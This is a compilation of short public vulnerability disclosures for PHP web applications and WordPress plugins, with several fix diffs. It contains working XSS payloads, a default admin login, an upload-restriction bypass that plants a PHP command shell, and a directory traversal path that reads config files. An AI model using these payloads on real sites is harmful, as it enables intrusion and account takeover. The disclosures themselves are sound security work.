AMSS++ version 2,0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : AMSS++ v 2.0 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar                                             |  | # Dork      : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Login : User = admin &  pass = 1234[+] http://127.0.0.1/pmss/index.php====Greetings to :=======================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh    |=========================================================================================================================================

AMSS++ 2.0 Insecure Settings

Event Script version 2.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/event-script-php/                             ││  Vendor   : SimplePHPscripts                                                           ││  Software : Event Script 2.1                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/ekhfb"><script>alert(1)</script>cg9xj?search=123Path: /preview.phpGET 'message' parameter is vulnerable to RXSShttps://website/preview.php?message=fy3sr<script>alert(1)</script>aqblo[-] Done

Event Script 2.1 Cross Site Scripting

Classified Ads Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/classified-ads-script-php/                    ││  Vendor   : SimplePHPscripts                                                           ││  Software : Classified Ads Script 1.8                                                  ││  Vuln Type: Reflected XSS - Stored XSS                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Reflected XSS                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        ││                                                                                        ││  Stored XSS                                                                            ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?id=14&cat_id=0&p=reioh%22%3e%3cscript%3ealert(1)%3c%2fscript%3eiv1mz&search=Path: /URL parameter is vulnerable to RXSShttps://website/preview.php/x5t6p"><script>alert(1)</script>w5omd?id=14&cat_id=0&p=&search=## Stored XSS-----------------------------------------------POST /classified-ads-script-php/classifiedscript/user.php HTTP/2Content-Disposition: form-data; name="title"<script>alert(1)</script>-----------------------------------------------POST parameter 'title' is vulnerable to XSS## Steps to Reproduce:1. As a [Normal User] Click on [Create Classified Ad] to create a [New Ads] on this Path (https://website/user.php?act=newAds)2. Inject your [XSS Payload] in "Enter Title"3. Save4. XSS Fired on Local User Browser5. When ADMIN check [Classified Ads Entry List] in Administration Panel to check [Waiting Approval Ads] on this Path (https://website/admin.php?act=ads)6. XSS Will Fire and Executed on his Browser [-] Done

Classified Ads Script 1.8 Cross Site Scripting

GuestBook Script version 2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/guestbook-script-php/                         ││  Vendor   : SimplePHPscripts                                                           ││  Software : GuestBook Script 2.2                                                       ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /URL parameter is vulnerable to RXSShttps://website/preview.php/mmkpe"><script>alert(1)</script>zqufc?act=newPath: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?SysMessage=1krvxb%3cscript%3ealert(1)%3c%2fscript%3elxq6x[-] Done

GuestBook Script 2.2 Cross Site Scripting

In Responsive Filemanager < 9.12.0, an attacker can bypass upload restrictions resulting in RCE.

**CVE-2022-44276-PoC**

PoC for Responsive Filemanager < 9.12.0 bypass upload restrictions lead to RCE

**Where's vuln?**

When uploading new file we go through function fix_filename: https://github.com/trippo/ResponsiveFilemanager/blob/9a7411f3eab3b7d8e2c78dcf40b4325bde2c548d/filemanager/upload.php#L112

In this function we have function strip_tags which searches brackets and removes them: https://github.com/trippo/ResponsiveFilemanager/blob/9a7411f3eab3b7d8e2c78dcf40b4325bde2c548d/filemanager/include/utils.php#L581

So, we can send file with filename lick shell.php<.txt, which will be renamed to shell.php due to function strip_tags.

But, there's additional check of file type by it's content: https://github.com/trippo/ResponsiveFilemanager/blob/9a7411f3eab3b7d8e2c78dcf40b4325bde2c548d/filemanager/upload.php#L101

So, we cannot upload classic php shell <?php system($_GET['c']);?>. But, we can do a little trick: function get_extension_from_mime works based on first several chars of file. So, if we start our payload with several 'a' chars, it can be detected with txt type.

**How to exploit**

1.  Intercept upload request with burp suite
2.  Change filename to shell.php<.txt 
3.  go to url/source/shell.php?c=<your\_command>

CVE-2022-44276: GitHub - HerrLeStrate/CVE-2022-44276-PoC: PoC for Responsive Filemanager < 9.12.0 bypass upload restrictions lead to RCE

The Subscribe2 plugin for WordPress is vulnerable to unauthorized access to email functionality due to a missing capability check when sending test emails in versions up to, and including, 10.40. This makes it possible for author-level attackers to send emails with arbitrary content and attachments to site users.

1<?php2if ( ! function\_exists( 'add\_action' ) ) {3        exit();4}56global $current\_user;78$s2\_admin \= ! empty( $\_POST\['s2\_admin'\] ) ? sanitize\_key( $\_POST\['s2\_admin'\] ) : '';910// was anything POSTed?11if ( 'mail' \=== $s2\_admin ) {12        if ( ! current\_user\_can( 'manage\_options' ) ) {13                die( '<p>' . esc\_html\_\_( 'Security error! You are not able to send email.', 'subscribe2' ) . '</p>' );14        }1516        if ( ! isset( $\_REQUEST\['\_wpnonce'\] ) || ! wp\_verify\_nonce( sanitize\_key( $\_REQUEST\['\_wpnonce'\] ), 'subscribe2-write\_subscribers' . S2VERSION ) ) {17                die( '<p>' . esc\_html\_\_( 'Security error! Your request cannot be completed.', 'subscribe2' ) . '</p>' );18        }1920        $subject \= html\_entity\_decode( stripslashes( wp\_kses( $this\->substitute( $\_POST\['subject'\] ), '' ) ), ENT\_QUOTES );21        $body    \= wpautop( $this\->substitute( stripslashes( $\_POST\['content'\] ) ), true );22        if ( '' !== $current\_user\->display\_name || '' !== $current\_user\->user\_email ) {23                $this\->myname  \= html\_entity\_decode( $current\_user\->display\_name, ENT\_QUOTES );24                $this\->myemail \= $current\_user\->user\_email;25        }26        if ( isset( $\_POST\['send'\] ) ) {27                if ( 'confirmed' \=== $\_POST\['what'\] ) {28                        $recipients \= $this\->get\_public();29                } elseif ( 'unconfirmed' \=== $\_POST\['what'\] ) {30                        $recipients \= $this\->get\_public( 0 );31                } elseif ( 'public' \=== $\_POST\['what'\] ) {32                        $confirmed   \= $this\->get\_public();33                        $unconfirmed \= $this\->get\_public( 0 );34                        $recipients  \= array\_merge( (array) $confirmed, (array) $unconfirmed );35                } elseif ( is\_numeric( $\_POST\['what'\] ) ) {36                        $category   \= intval( $\_POST\['what'\] );37                        $recipients \= $this\->get\_registered( "cats=$category" );38                } elseif ( 'all\_users' \=== $\_POST\['what'\] ) {39                        $recipients \= $this\->get\_all\_registered();40                } elseif ( 'all' \=== $\_POST\['what'\] ) {41                        $confirmed   \= $this\->get\_public();42                        $unconfirmed \= $this\->get\_public( 0 );43                        $registered  \= $this\->get\_all\_registered();44                        $recipients  \= array\_merge( (array) $confirmed, (array) $unconfirmed, (array) $registered );45                } else {46                        $recipients \= $this\->get\_registered();47                }48        } elseif ( isset( $\_POST\['preview'\] ) ) {49                global $user\_email;50                $recipients\[\] \= $user\_email;51        }5253        $uploads \= array();54        if ( ! empty( $\_FILES ) ) {55                foreach ( $\_FILES\['file'\]\['name'\] as $key \=> $value ) {56                        if ( 0 \=== $\_FILES\['file'\]\['error'\]\[ $key \] ) {57                                $file \= array(58                                        'name'     \=> $\_FILES\['file'\]\['name'\]\[ $key \],59                                        'type'     \=> $\_FILES\['file'\]\['type'\]\[ $key \],60                                        'tmp\_name' \=> $\_FILES\['file'\]\['tmp\_name'\]\[ $key \],61                                        'error'    \=> $\_FILES\['file'\]\['error'\]\[ $key \],62                                        'size'     \=> $\_FILES\['file'\]\['size'\]\[ $key \],63                                );6465                                $uploads\[\] \= wp\_handle\_upload(66                                        $file,67                                        array(68                                                'test\_form' \=> false,69                                        )70                                );71                        }72                }73        }74        $attachments \= array();75        if ( ! empty( $uploads ) ) {76                foreach ( $uploads as $upload ) {77                        if ( ! isset( $upload\['error'\] ) ) {78                                $attachments\[\] \= $upload\['file'\];79                        } else {80                                $upload\_error \= $upload\['error'\];81                        }82                }83        }8485        if ( empty( $body ) ) {86                $error\_message \= \_\_( 'Your email was empty', 'subscribe2' );87                $success       \= false;88        } elseif ( isset( $upload\_error ) ) {89                $error\_message \= $upload\_error;90                $success       \= false;91        } else {92                $success       \= $this\->mail( $recipients, $subject, $body, 'html', $attachments );93                $error\_message \= \_\_( 'Check your settings and check with your hosting provider', 'subscribe2' );94        }9596        if ( $success ) {97                if ( isset( $\_POST\['preview'\] ) ) {98                        $message \= '<p class="s2\_message">' . \_\_( 'Preview message sent!', 'subscribe2' ) . '</p>';99                } elseif ( isset( $\_POST\['send'\] ) ) {100                        $message \= '<p class="s2\_message">' . \_\_( 'Message sent!', 'subscribe2' ) . '</p>';101                }102        } else {103                global $phpmailer;104105                $mailer\_error \= ! empty( $phpmailer\->ErrorInfo ) ? $phpmailer\->ErrorInfo : '';106                $message      \= '<p class="s2\_error">' . \_\_( 'Message failed!', 'subscribe2' ) . '</p>' . $error\_message . $mailer\_error;107        }108109        echo '<div id="message" class="' . ( $success ? 'updated' : 'error' ) . '"><strong><p>' . wp\_kses\_post( $message ) . '</p></strong></div>' . "\\r\\n";110}111112// show our form113echo '<div class="wrap">';114echo '<h1>' . esc\_html\_\_( 'Send an email to subscribers', 'subscribe2' ) . '</h1>' . "\\r\\n";115echo '<form method="post" enctype="multipart/form-data">' . "\\r\\n";116117wp\_nonce\_field( 'subscribe2-write\_subscribers' . S2VERSION );118119$body \= ! empty( $\_POST\['content'\] ) ? esc\_textarea( $\_POST\['content'\] ) : '';120if ( isset( $\_POST\['subject'\] ) ) {121        $subject \= stripslashes( esc\_html( $\_POST\['subject'\] ) );122} else {123        $subject \= \_\_( 'A message from', 'subscribe2' ) . ' ' . html\_entity\_decode( get\_option( 'blogname' ), ENT\_QUOTES );124}125126echo '<p>' . esc\_html\_\_( 'Subject', 'subscribe2' ) . ': <input type="text" size="69" name="subject" value="' . esc\_attr( $subject ) . '" /> <br><br>';127echo '<textarea rows="12" cols="75" name="content">' . $body . '</textarea>';128echo "<br><div id=\\"upload\_files\\"\><input type=\\"file\\" name=\\"file\[\]\\" onChange=\\"remove\_selected\_image()\\"\></div>\\r\\n";129echo '<input type="button" class="button-secondary" name="addmore" value="' . esc\_attr( \_\_( 'Add More Files', 'subscribe2' ) ) . "\\" onClick=\\"add\_file\_upload();\\" />\\r\\n";130echo "<br><br>\\r\\n";131echo esc\_html\_\_( 'Recipients:', 'subscribe2' ) . ' ';132$this\->display\_subscriber\_dropdown( apply\_filters( 's2\_subscriber\_dropdown\_default', 'registered' ), false );133echo '<input type="hidden" name="s2\_admin" value="mail" />';134echo '<p class="submit"><input type="submit" class="button-secondary" name="preview" value="' . esc\_attr( \_\_( 'Preview', 'subscribe2' ) ) . '" />&nbsp;<input type="submit" class="button-primary" name="send" value="' . esc\_attr( \_\_( 'Send', 'subscribe2' ) ) . '" /></p>';135echo '</form></div>' . "\\r\\n";136echo '<div style="clear: both;"><p>&nbsp;</p></div>';137?>138<script type="text/javascript">139    //<!\[CDATA\[140    function add\_file\_upload() {141        const fileUploadContainer = document.getElementById('upload\_files'),142            fileNode = document.createElement('input'),143            spanNode = document.createElement('span'),144            lineBreak = document.createElement('br');145146        // Insert multiple file.147        if (!Boolean(fileNode.value)) {148            fileNode.type = 'file';149            fileNode.name = 'file\[\]';150            spanNode.classList.add('dashicons', 'dashicons-no-alt');151            spanNode.style.marginTop = '4px';152153            fileUploadContainer.appendChild(lineBreak);154            fileUploadContainer.appendChild(fileNode);155            fileUploadContainer.appendChild(spanNode);156        }157158        // Remove uploaded image if selected otherwise remove field.159        spanNode.addEventListener('click', function () {160            if (Boolean(fileNode.value)) {161                fileNode.value = '';162                return;163            }164165            fileNode.remove();166            spanNode.remove();167            lineBreak.remove();168        });169    }170171    // Handle first selected image.172    function remove\_selected\_image() {173        const fileUploadContainer = document.getElementById('upload\_files'),174            firstFile = fileUploadContainer.getElementsByTagName('input')\[0\],175            spanNode = document.createElement('span');176177        if (!Boolean(firstFile.nextSibling)) {178            spanNode.style.marginTop = '4px';179            spanNode.classList.add('dashicons', 'dashicons-no-alt');180            firstFile.after(spanNode);181        }182183        spanNode.addEventListener('click', function () {184            firstFile.value = '';185            this.remove();186        });187    }188    //\]\]>189</script>190<?php191require ABSPATH . 'wp-admin/admin-footer.php';192// just to be sure193die;

CVE-2023-1844: send-email.php in subscribe2/trunk/admin – WordPress Plugin Repository

The Salon Booking System plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.6. This is due to missing or incorrect nonce validation on the 'save_customer' function. This makes it possible for unauthenticated attackers to change the admin role to customer or change the user meta to arbitrary values via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.

Timestamp:

06/27/2023 11:32:24 AM (15 hours ago)

wordpresschef

Message:

Update trunk - version 8.4.8  

Location:

salon-booking-system/trunk

Files:

  

*   readme.txt (2 diffs)
*   salon.php (2 diffs)
*   src/SLN/Admin/Customers.php (1 diff)
*   views/admin/\_customer.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **salon-booking-system/trunk/readme.txt**
    
    r2931279
    
    r2931406
    
     
    
    5
    
    5
    
    Tested up to: 6.1
    
    6
    
    6
    
    Requires PHP: 7.4.8
    
    7
    
     
    
    Stable tag: 8.4.7
    
     
    
    7
    
    Stable tag: 8.4.8
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    344
    
    344
    
    \== Changelog ==
    
    345
    
    345
    
     
    
    346
    
    27.06.2023
    
     
    
    347
    
     
    
    348
    
    \* Fix vulnerability issue
    
     
    
    349
    
    346
    
    350
    
    23.06.2023
    
    347
    
    351
    
*   **salon-booking-system/trunk/salon.php**
    
    r2931279
    
    r2931406
    
     
    
    4
    
    4
    
    Plugin Name: Salon Booking Wordpress Plugin - Free Version
    
    5
    
    5
    
    Description: Let your customers book you services through your website. Perfect for hairdressing salons, barber shops and beauty centers.
    
    6
    
     
    
    Version: 8.4.7
    
     
    
    6
    
    Version: 8.4.8
    
    7
    
    7
    
    Plugin URI: http://salonbookingsystem.com/
    
    8
    
    8
    
    Author: Salon Booking System
    
    …
    
    …
    
     
    
    42
    
    42
    
    define('SLN\_PLUGIN\_DIR', untrailingslashit(dirname(\_\_FILE\_\_)));
    
    43
    
    43
    
    define('SLN\_PLUGIN\_URL', untrailingslashit(plugins\_url('', \_\_FILE\_\_)));
    
    44
    
     
    
    define('SLN\_VERSION', '8.4.6');
    
     
    
    44
    
    define('SLN\_VERSION', '8.4.8');
    
    45
    
    45
    
    define('SLN\_STORE\_URL', 'https://salonbookingsystem.com');
    
    46
    
    46
    
    define('SLN\_AUTHOR', 'Salon Booking');
    
*   **salon-booking-system/trunk/src/SLN/Admin/Customers.php**
    
    r2779160
    
    r2931406
    
     
    
    67
    
    67
    
    68
    
    68
    
        private function save\_customer($user\_id) {
    
     
    
    69
    
            check\_admin\_referer('sln\_update\_user\_'.$user\_id);
    
    69
    
    70
    
            $customer = \[\];
    
    70
    
    71
    
            $email = isset($\_POST\['sln\_customer\_meta'\]\['\_sln\_email'\]) ? sanitize\_email( wp\_unslash($\_POST\['sln\_customer\_meta'\]\['\_sln\_email'\]) ) : false;
    
*   **salon-booking-system/trunk/views/admin/\_customer.php**
    
    r2920616
    
    r2931406
    
     
    
    28
    
    28
    
    29
    
    29
    
            <input type="hidden" name="id" id="id" value="<?php echo $customer->getId(); ?>">
    
     
    
    30
    
            <?php wp\_nonce\_field('sln\_update\_user\_'. ($customer->isEmpty() ? 0 : $customer->getId())); ?>
    
    30
    
    31
    
                <div class="sln-box sln-box--main">
    
    31
    
    32
    
                    <div class="row">
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2023-3427: Changeset 2931406 for salon-booking-system – WordPress Plugin Repository

Cross Site Request Forgery (CSRF) vulnerability was discovered in CatfishCMS 4.8.63 that would allow attackers to obtain administrator permissions via /index.php/admin/index/modifymanage.html.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-18409: Bug: CatfishCMS V 4.8.63 CSRF · Issue #5 · xwlrbh/Catfish

Stored cross site scripting (XSS) vulnerability in Chaoji CMS v2.18 that allows attackers to execute arbitrary code via /index.php?admin-master-webset.

CVE-2020-18414: Bug: ChaojiCMS V2.18 XSS #3 · Issue #3 · GodEpic/chaojicms

Directory Traversal vulnerability found in Cryptoprof WCMS v.0.3.2 allows a remote attacker to execute arbitrary code via the wex/cssjs.php parameter.

A Arbitrary File Reading Vulnerability in wex/cssjs.php  
There is a vulnerability that can read and modify any files to getshell.  
Affected software:WCMS V0.3.2

poc:  
use ../ to directory traversal vulnerability.  
I can read config.php get admin account.  
/wex/cssjs.php?path=..//wcms/config.php&type=css  

I can still do it.  
  

Now let's modify this file.

  
Click Save  
  
success！

so I can modify php file to getshell.  
That Access without login.  
  

Source code:  
wex/cssjs.php  
  
We can see there are not filtering with '../' , that’s why make directory traversal vulnerability.

Tag

#php